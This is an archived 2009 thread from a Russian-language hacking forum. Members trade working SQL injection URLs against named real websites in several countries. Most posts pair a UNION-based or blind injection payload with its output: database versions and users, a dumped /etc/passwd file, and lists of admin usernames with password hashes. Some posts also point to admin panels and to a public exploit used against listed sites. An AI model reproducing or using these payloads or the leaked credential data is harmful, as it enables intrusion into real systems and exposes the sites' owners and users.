ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.02.2009, 01:37
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
ТИЦ : 1100
Код:
http://www.tourtrans.ru/index.php?page=news&id=-1+union+select+1,2,concat _ws(0x3a, version(),database(),user ())--
Database Version : 4.0.27-log
Database name : tteurope
User name : tteurope@zvm21.host.ru
---------------------------------------------------#
PR: 5
тИЦ: 950
Код:
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),use r()),6,7,8,9,10,11,12,13,14,15,16,17--
Database Version : 5.0.67-log
Database name : solvex-travel_ru
User name : solvex-travel_ru@zvm23.host.ru
Код:
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,table _name,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.tables+limit+0,1--
50 столбцов, но юзверей я что-то так и не нашел (((
Последний раз редактировалось f1ng3r; 26.02.2009 в 03:04..
Причина: add
|
|
|
26.02.2009, 03:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+vers ion()),1,1))=x/*
x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+data base()),1,1))=x/*
x=115,121,115,116,101,109,112,95,115,112
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+user ()),1,1))=x/*
x=115,121,115,116,101,109,112,95,115,112,64,108,11 1,99,97,108,104,111,115,116
Version : 4.1.22-standard
Database : systemp_sp
User : systemp_sp@localhost
|
|
|
|
26.02.2009, 04:27
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
aib.in.ua вывод в title
PHP код:
http://aib.in.ua/objav/car/?id=-1+union+select+1,2,3,concat_ws(0x3A,@@version,user(),database())+--+
www.architectuurcentrumnijmegen.nl PageRank - 4
PHP код:
http://www.architectuurcentrumnijmegen.nl/default.php?menu=-99999/**/union/**/select/**/unhex(hex(version()))/*
www.merkur.ba PageRank - 4
PHP код:
http://www.merkur.ba/aktuelno/vijest.php?id=-155+union+select+unhex(hex(@@version)),2,3,4,5,6+--+
www.pave.fr PageRank - 5
PHP код:
http://www.pave.fr/sections.php3?op=viewarticle&artid=-255+union+select+1,2,@@version,4,5+--+
www.apci.asso.fr PageRank - 7, это самое большее количество колонок c которым я только вcтречался(135):
PHP код:
http://www.apci.asso.fr/l_observeur/realisation.php?id=-281+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,unhex(hex(concat_ws(0x3A,@@version,user(),database()))),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135+--+
www.arnaudmontebourg.fr PageRank - 4 вывод в title
PHP код:
http://www.arnaudmontebourg.fr/web/nav/article.php?id=425+union+select+concat_ws(user(),@@version,database()),2,3,4+--+
Последний раз редактировалось AkyHa_MaTaTa; 26.02.2009 в 05:43..
|
|
|
|
26.02.2009, 07:40
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
http://www.milw0rm.com/exploits/8104
Несколько сайтов уже похеконо турками муднями
http://www.gemeni.com.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://dr-gng.dp.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://all-perfumes.com.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://www.med-tech.kiev.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://perfumes4you.kiev.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://forex-4-all.ru/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://scotland.org.ua/index.php?act=publ&id=4-3+UNION+SELECT+1,2,3,4,5
http://www.bfstimul.dp.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
|
|
|
|
26.02.2009, 12:03
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
! новичкам посвящается...смотрим что ошибки нет , но идём дальше ..не сдаемся
http://www.cg-gc.ro/cgro/product.php?id_product=-753'
http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--
Database Version: 5.0.51b-log
Database name: cg_comert
User name: webdesign@localhost
http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+load_file(0x2F6574632F70617373776 4),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--
root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: operator:x:11:0 perator:/root:/bin/bash ftp:x:14:50::/home/ftp: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash nobody:x:99:99:nobody:/: design:x:1000:100::/home/design:/bin/bash ceftac:x:1001:100::/home/design/websites/ceftac:/usr/libexec/sftp-server mihai:x:1003:100:,,,:/home/mihai:/bin/bash smmsp:x:25:25:smmsp:/var/spool/clientmqueue: stefan.simon:x:1004:100::/home/stefan:/bin/bash noemi:x:1005:100::/home/design/websites/cggc/download:/usr/libexec/sftp-server apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
http://www.cg-gc.ro/cgro/product.php?id_product=-753+UNION+SELECT+CONCAT_WS(0x3a,id,username,parola ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+cg. admini+LIMIT+1,1--
10:corina:0fb9fe42465a3bba
2:florin:*51D2FAEA3257E9A8F8A03DE0DDD63064714239A9
3:fmakai:3519dfb35bfb1071
4:mbadici:1f27f0166150ae6c
5:Cristi:1fd2ce501c6fc21b
9:cornel:301f3d5a629c8bbf
11:corneliu:04c63dc1449c6ee3
13:mihain:413854603fb8058d
14: oana:4f9f544d12d2175e
noemi:60ab75b07c05f0b2
16:cosmin:4a76bb876d218975
27:consumabile:6e174a6035b92e82
28: pressroom:1dce0b286052aba9
29:xfilez:43e9a4ab75570f5b
18:manuela@cg-gc.ro:*C14F97B95A5580BFC49025850E7B8A907E05BBE4
23:loredana:0836d7b259d2893a
20:dorina:7b3c27ed548e8681
21:admin:6c05b43422e2603d
24:marius:789d1ccf4e8f52a2
25:valentinp:6475ff2774a36508
26:gsm:7a2dd7a521e0dd43
30:eudis:1abcf14c12a3b2ef
Последний раз редактировалось Gorev; 26.02.2009 в 12:05..
|
|
|
|
26.02.2009, 12:10
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
www.novibeograd.info PageRank - 3 
PHP код:
http://www.novibeograd.info/index.php?strana=vest&id=1+union+select+1,concat_ws(0x3A,memberName,passwd,passwordSalt),3,4,5+from+novibgd_forum.smf_members+--+
Сам форум здеся
http://www.novibeograd.info/smf/
www.dadaprod.org PageRank - 4
PHP код:
http://www.dadaprod.org/index.php?mode=samizdat&id=-25+union+select+1,2,3,4,concat_ws(0x3a,user_level,user_nom,user_pwd),6,7,8,9,10,11,12+from+dadaprod_www.dc_user+--+
www.fonora.com PageRank - 4
PHP код:
http://www.fonora.com/index.php?page=product&id=25+union+select+concat_ws(0x3A,user(),@@version,database()),2+--+&lang=fr
Последний раз редактировалось AkyHa_MaTaTa; 26.02.2009 в 15:59..
|
|
|
|
26.02.2009, 13:18
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
PR: 5
Тиц: 0
Версия: 4.1.20
База данных: adminpfsa
Юзверь: adminpfsa@localhost
Код:
http://www.pfsa.unsa.ba/stream/stream.php?kat=-1%20union%20select%201,2,3,4,5,6,7,8,9--
Админка: https://195.130.35.116:19638/siteadmin/?ocw_login_domain=pfsa.unsa.ba
|
|
|
|
26.02.2009, 13:20
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
PR : 5
ТИЦ : 1000
Код:
http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,12,13,14--
Database Version : 5.1.30
Database name : matchfishing2
User name : matchfishing2@localhost
админ:
Код:
http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a,login,password),6,7,8,9,10,11,12,13,14+ from+ssrusers+limit+0,1--
админка:
Код:
http://www.matchfishing.ru/admin/
в админке есть много чего 
|
|
|
|
26.02.2009, 15:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.isoline.ro/index.php?p=view&show=-10+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3--
Database Version: 5.0.67-log
Database name: isoline
User name: imguser@crunch.dreamhost.com
|
|
|
|
26.02.2009, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.artlink.org.ro/index.php?p=view&show=-71+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,version(),database(),user()))),7,8,9--&lang=1
Version : 4.1.11-Debian_4sarge8
Database : artlink_org_ro
User : artlink_org_ro@webgate-a.infinium.ro
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
